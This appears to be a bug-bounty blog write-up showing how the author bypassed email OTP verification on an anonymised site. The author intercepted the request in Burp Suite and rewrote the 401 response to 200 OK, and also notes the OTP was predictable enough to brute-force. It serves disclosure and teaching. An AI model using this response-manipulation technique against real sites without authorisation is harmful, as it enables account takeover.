OTP Bypass By Response Manipulation

wants to earn 3 Digit $$$ in 15 Min read.

Greetings everyone! I am Shuttlertech, Senior Cybersecurity Analyst, Youtuber, Freelancer, Cybersecurity Trainer & Bug hunter.
without wasting time.

Let’s Start

It’s about Private programs. I have used Some of the Responsive Disclosure Google Dork. After deciding I simply start Recon As My target Is www.xyz.xom/ I can’t disclose the name of the target due to confidentiality.

Now, I simply try to create an account on www.xyz.com Here. I fill up the Registration form with random details & after registration, It asks for OTP Verification.

OBSERVATION PART:

Now, I got OTP On my email It’s 4 digit number. Actually, OTP was Vulnerable. This OTP looks like “0123” Here “23” values only change when I request for OTP, again and again. I found that OTP is Vulnerable to brute forcing.

Attacking Part:
here, Now we need to enter OTP verification Here I randomly entered 0000 Before I click next I have already set up By Burp Now I click next capture request.

As requested i got

POST /v1/email?change=false&code=0000 HTTP/1.1

Host: xyz.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/json, text/plain, */*

Accept-Language: en-US,en;q=0.5

Now, simply do forward and Response To This host

As Response We Get in Burpsuite

HTTP/1.1 401 Unauthorized

Content-Security-Policy: frame-ancestors ‘none’

Content-Type: application/json; charset=utf-8

Content-Length: 42

Date: Fri, 22 May 2020 19:20:04 GMT

{“err”:”Incorrect code”,”ECODE”:”USR_014"}

As above Response, I got 401 Unauthorized No worries, it started and gives us chance to think about it as I always say Cyber security field is all about research.

Now, bypass using response manipulation simply change the response to this type as shown below.

HTTP/1.1 200 OK

Content-Security-Policy: frame-ancestors ‘none’

Content-Type: application/json; charset=utf-8

Content-Length: 42

Date: Fri, 22 May 2020 19:20:04 GMT

{}

BOOM! Now I have logged in without any verification as I bypass OTP(One time password).

Do Subscribe to me for Live POCS: https://www.youtube.com/channel/UCS7EGEUlV6Sr7VUnzhBBZrg